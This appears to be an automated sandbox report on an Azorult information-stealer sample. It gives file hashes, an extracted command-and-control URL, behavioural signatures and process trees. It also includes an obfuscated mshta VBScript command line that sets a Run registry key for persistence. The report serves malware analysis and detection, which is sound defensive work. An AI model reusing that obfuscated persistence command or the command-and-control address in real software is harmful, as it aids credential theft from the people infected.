Analysis
- max time kernel: 80s
- max time network: 72s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 03-07-2022 05:18
Static task: static1
Behavioral task: behavioral1
- Sample: 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
- Resource: win10v2004-20220414-en
General
- Target: 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
- Size: 836KB
- MD5: bab64cf036bc9fd6cc8af20bda3f12e3
- SHA1: 82d47ceefe73b819b0c3dc50460086c090846241
- SHA256: 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c
- SHA512: ce2f52c4f48c13ac6085446f2089d1668a2c8db136a7b821c6de20791e5f09b7a02db06c2f5333cd365e7235219f4a3edf5f4993a8d56ee25a8a18bd460fd846
Malware Config
Extracted:
- azorult
- http://37.72.175.157:8080/chi/index.php
Signatures
- Azorult
  An information stealer that was first discovered in 2016, targeting browsing history and passwords.
- Executes dropped EXE (1 IoC)
  Processes (pid, process):
  1148  COPENS.exe
- Loads dropped DLL (2 IoCs)
  Processes (pid, process):
  892  3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
  892  3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes (description, ioc, process):
  Key created      \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run  mshta.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Udskamningens2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\COPENS.exe"  mshta.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes (pid, process):
  892   3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
  1148  COPENS.exe
- Suspicious use of UnmapMainImage (1 IoC)
  Processes (pid, process):
  1148  COPENS.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes (description, pid, process, target process):
  PID 892 wrote to memory of 948   892  3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe  mshta.exe   (4 entries)
  PID 892 wrote to memory of 1148  892  3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe  COPENS.exe  (4 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe"
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Udskamningens2"" : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\COPENS.exe"",""REG_SZ"" : window.close")
    - Adds Run key to start application
  - C:\Users\Admin\AppData\Local\Temp\COPENS.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\COPENS.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of UnmapMainImage
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\COPENS.exe
  Filesize: 836KB
  MD5: 3c98a0d1f58b70aa683bea99b3f92811
  SHA1: bdcae100842c0441de4c8f2ecb5b98ac45a2d139
  SHA256: 6cf67dff757f624106f5355699b1f0f994c02d26f0987ac93fad00ccbab77f2a
  SHA512: 334bf7938e248ce1dc6a1340981a07d1f9367375994748cdf2366e0c4afff3be90a60ec71dac82160d3550c4a0d26a2e1515f3b7d33b105aee84d0efbf3d15d9
- \Users\Admin\AppData\Local\Temp\COPENS.exe
  Filesize: 836KB
  MD5: 3c98a0d1f58b70aa683bea99b3f92811
  SHA1: bdcae100842c0441de4c8f2ecb5b98ac45a2d139
  SHA256: 6cf67dff757f624106f5355699b1f0f994c02d26f0987ac93fad00ccbab77f2a
  SHA512: 334bf7938e248ce1dc6a1340981a07d1f9367375994748cdf2366e0c4afff3be90a60ec71dac82160d3550c4a0d26a2e1515f3b7d33b105aee84d0efbf3d15d9
- memory/892-56-0x00000000763B1000-0x00000000763B3000-memory.dmp
  Filesize: 8KB
- memory/892-62-0x0000000077C50000-0x0000000077DF9000-memory.dmp
  Filesize: 1.7MB
- memory/892-64-0x0000000077E30000-0x0000000077FB0000-memory.dmp
  Filesize: 1.5MB
- memory/948-57-0x0000000000000000-mapping.dmp
- memory/1148-60-0x0000000000000000-mapping.dmp
- memory/1148-68-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB
- memory/1148-73-0x0000000077C50000-0x0000000077DF9000-memory.dmp
  Filesize: 1.7MB
- memory/1148-74-0x0000000077E30000-0x0000000077FB0000-memory.dmp
  Filesize: 1.5MB
- memory/1148-75-0x0000000077E30000-0x0000000077FB0000-memory.dmp
  Filesize: 1.5MB